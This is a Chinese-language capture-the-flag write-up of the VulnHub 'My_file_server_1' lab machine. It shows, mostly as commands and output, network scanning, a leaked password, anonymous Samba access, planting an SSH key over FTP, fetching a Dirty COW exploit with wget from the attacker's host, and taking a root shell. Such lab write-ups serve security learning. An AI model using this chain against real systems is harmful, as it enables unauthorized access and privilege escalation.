VulnHub My_file_server_1 writeup

发表于 更新于 分类于 阅读次数:
本文字数: 8.8k 阅读时长 ≈ 8 分钟

下载地址
查看目标ip及端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
❯ nmap -sP 192.168.231.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 10:31 CST
Nmap scan report for 192.168.231.1
Host is up (0.00023s latency).
MAC Address: 92:9C:4A:9B:DD:64 (Unknown)
Nmap scan report for 192.168.231.13
Host is up (0.00076s latency).
MAC Address: 00:0C:29:4D:BF:1B (VMware)
Nmap scan report for 192.168.231.11
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.22 seconds
❯ nmap -p 1-65535 -A 192.168.231.13
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 10:32 CST
Nmap scan report for localhost (192.168.231.13)
Host is up (0.00051s latency).
Not shown: 64523 filtered ports, 1004 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.231.11
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      35575/tcp   nlockmgr
|   100021  1,3,4      35988/tcp6  nlockmgr
|   100021  1,3,4      46841/udp6  nlockmgr
|   100021  1,3,4      48732/udp   nlockmgr
|   100024  1          34256/tcp6  status
|   100024  1          34266/udp6  status
|   100024  1          54181/udp   status
|   100024  1          56026/tcp   status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:4D:BF:1B (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.4 - 3.10
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: 6h10m01s, deviation: 3h10m29s, median: 7h59m59s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2021-04-27T16:03:42+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-04-27T10:33:42
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms localhost (192.168.231.13)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.21 seconds

dirsearch扫描发现readme.txt

1
2
My Password is
rootroot1

samba匿名登录,下载secure文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
❯ smbclient //192.168.231.13/smbdata
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 20 19:07:55 2020
  ..                                  D        0  Tue Feb 18 19:47:54 2020
  anaconda                            D        0  Tue Feb 18 19:48:15 2020
  audit                               D        0  Tue Feb 18 19:48:15 2020
  boot.log                            N     6120  Tue Feb 18 19:48:16 2020
  btmp                                N      384  Tue Feb 18 19:48:16 2020
  cron                                N     4813  Tue Feb 18 19:48:16 2020
  dmesg                               N    31389  Tue Feb 18 19:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 19:48:16 2020
  glusterfs                           D        0  Tue Feb 18 19:48:16 2020
  lastlog                             N   292292  Tue Feb 18 19:48:16 2020
  maillog                             N     1982  Tue Feb 18 19:48:16 2020
  messages                            N   684379  Tue Feb 18 19:48:17 2020
  ppp                                 D        0  Tue Feb 18 19:48:17 2020
  samba                               D        0  Tue Feb 18 19:48:17 2020
  secure                              N    11937  Tue Feb 18 19:48:17 2020
  spooler                             N        0  Tue Feb 18 19:48:17 2020
  tallylog                            N        0  Tue Feb 18 19:48:17 2020
  tuned                               D        0  Tue Feb 18 19:48:17 2020
  wtmp                                N    25728  Tue Feb 18 19:48:17 2020
  xferlog                             N      100  Tue Feb 18 19:48:17 2020
  yum.log                             N    10915  Tue Feb 18 19:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 15:46:38 2020

                19976192 blocks of size 1024. 18283292 blocks available
smb: \> get secure
getting file \secure of size 11937 as secure (1942.8 KiloBytes/sec) (average 1942.9 KiloBytes/sec)

在最后一行发现信息

1
Feb 18 17:17:09 localhost passwd: pam_unix(passwd:chauthtok): password changed for smbuser

尝试用用户名smbuser密码rootroot1登录ftp,传入公钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
❯ ftp 192.168.231.13
Connected to 192.168.231.13.
220 (vsFTPd 3.0.2)
Name (192.168.231.13:jxswcy): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx------    2 1000     1000           79 Feb 18  2020 .
drwxr-xr-x    3 0        0              20 Feb 19  2020 ..
-rw-------    1 1000     1000           27 Feb 20  2020 .bash_history
-rw-r--r--    1 1000     1000           18 Mar 05  2015 .bash_logout
-rw-r--r--    1 1000     1000          193 Mar 05  2015 .bash_profile
-rw-r--r--    1 1000     1000          231 Mar 05  2015 .bashrc
226 Directory send OK.
ftp> pwd
257 "/home/smbuser"
ftp> mkdir ~/.ssh
257 "/home/smbuser/.ssh" created
ftp> put /home/jxswcy/id_rsa.pub ~/.ssh/authorized_keys
local: /home/jxswcy/id_rsa.pub remote: ~/.ssh/authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
395 bytes sent in 0.00 secs (3.4880 MB/s)

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ searchsploit dirty
------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                            | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                            | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)   | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                      | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                       | linux/local/40611.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                   | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                         | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                          | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                               | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                               | linux/local/46362.py
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
❯ cp /usr/share/exploitdb/exploits/linux/local/40616.c ./
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ wget http://192.168.231.11:8000/40616.c
--2021-04-27 16:44:13--  http://192.168.231.11:8000/40616.c
Connecting to 192.168.231.11:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4963 (4.8K) [text/x-csrc]
Saving to: ‘40616.c’

100%[==========================================================================================================>] 4,963       --.-K/s   in 0.001s  

2021-04-27 16:44:13 (5.73 MB/s) - ‘40616.c’ saved [4963/4963]

[smbuser@fileserver tmp]$ gcc -pthread 40616.c -o exp
40616.c: In function ‘procselfmemThread’:
40616.c:99:9: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [enabled by default]
         lseek(f,map,SEEK_SET);
         ^
In file included from 40616.c:28:0:
/usr/include/unistd.h:334:16: note: expected ‘__off_t’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^
[smbuser@fileserver tmp]$ ./exp
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 27832
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
[root@fileserver tmp]# cd /root
[root@fileserver root]# ls
proof.txt
[root@fileserver root]# cat proof.txt
Best of Luck
af52e0163b03cbf7c6dd146351594a43